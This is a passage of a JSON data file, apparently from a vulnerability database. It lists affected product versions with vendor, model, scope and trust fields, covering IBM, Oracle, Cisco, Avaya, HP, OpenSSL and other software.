            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.4"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.4.19"
          },
          {
            "_id": null,
            "model": "websphere process server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.4"
          },
          {
            "_id": null,
            "model": "telepresence advanced media gateway series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "data ontap operating in 7-mode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1.4"
          },
          {
            "_id": null,
            "model": "unified attendant console premium edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "aura communication manager ssp04",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp03",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6.0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.040"
          },
          {
            "_id": null,
            "model": "upward integration modules for microsoft system center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8r",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "firesight system software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.4.1.2"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.6"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.011"
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "malware analyzer g2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "jdk update14",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10d",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "infosphere identity insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.4.1.8"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.3"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x22079060"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.039"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.0.11"
          },
          {
            "_id": null,
            "model": "physical access gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x88042590"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0l",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10k",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "upward integration modules integrated installer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.2"
          },
          {
            "_id": null,
            "model": "cognos insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.0.1"
          },
          {
            "_id": null,
            "model": "idataplex dx360 m4 water cooled type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "79790"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "jdk update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.23"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.61"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "initiate master data service patient hub",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "malware analysis appliance",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.3"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.8.06"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.44"
          },
          {
            "_id": null,
            "model": "rational automation framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8p",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere real time sr6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5.0"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3.2"
          },
          {
            "_id": null,
            "model": "b2b advanced communications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.2"
          },
          {
            "_id": null,
            "model": "unified attendant console business edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.15-210"
          },
          {
            "_id": null,
            "model": "websphere mq for openvms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v6"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "websphere real time sr4-fp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.5"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.6"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10g",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "jre update21",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0.95"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.6"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.11"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.9"
          },
          {
            "_id": null,
            "model": "bbm on windows phone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.0.0.24"
          },
          {
            "_id": null,
            "model": "virtualization experience media engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.11"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.08"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.037"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.0.1"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.7"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1.1"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.45"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.8"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.8"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12p",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.8"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365079150"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.6"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.3"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.205"
          },
          {
            "_id": null,
            "model": "jre update32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.320"
          },
          {
            "_id": null,
            "model": "firesight system software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.4.0.2"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1.3"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1c",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2.1"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "cics transaction gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.2"
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.170"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12o",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.18"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.1"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3.2"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8v"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.041"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.7"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 23819 44",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.1"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8.780"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.12"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "upward integration modules scvmm add-in",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.2"
          },
          {
            "_id": null,
            "model": "identity service engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "mysql server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5.6.15"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser ifix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.11.04"
          },
          {
            "_id": null,
            "model": "virtual connect enterprise manager sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4.1"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.19"
          },
          {
            "_id": null,
            "model": "storediq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.4"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp04",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "sametime community server hf1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.11"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2.0.860"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 09",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "jre update25",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.3.0.1"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.2"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "_id": null,
            "model": "email security appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.0.4.8-p3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.3"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.10"
          },
          {
            "_id": null,
            "model": "rational developer for aix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.11",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.12.1"
          },
          {
            "_id": null,
            "model": "notes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.010"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip multicast qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4.1"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.14"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.3"
          },
          {
            "_id": null,
            "model": "network performance analytics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.64"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.6"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "rational software architect for websphere software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.4"
          },
          {
            "_id": null,
            "model": "rational requisitepro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.5.0.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.8"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.0"
          },
          {
            "_id": null,
            "model": "hunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8l",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.20"
          },
          {
            "_id": null,
            "model": "video surveillance series ip cameras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "70000"
          },
          {
            "_id": null,
            "model": "project openssl h",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.6"
          },
          {
            "_id": null,
            "model": "systems insight manager update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.31"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "tririga for energy optimization",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3950x571430"
          },
          {
            "_id": null,
            "model": "project openssl i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi for net",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "workload deployer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.17"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0i",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.141"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.12"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.3"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.4.1"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.4"
          },
          {
            "_id": null,
            "model": "notes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1.2"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.045"
          },
          {
            "_id": null,
            "model": "system idataplex dx360 m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x63800"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.205"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.3.0"
          },
          {
            "_id": null,
            "model": "security privileged identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "content collector for sap applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "ctpview 7.1r1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.4.0.5"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
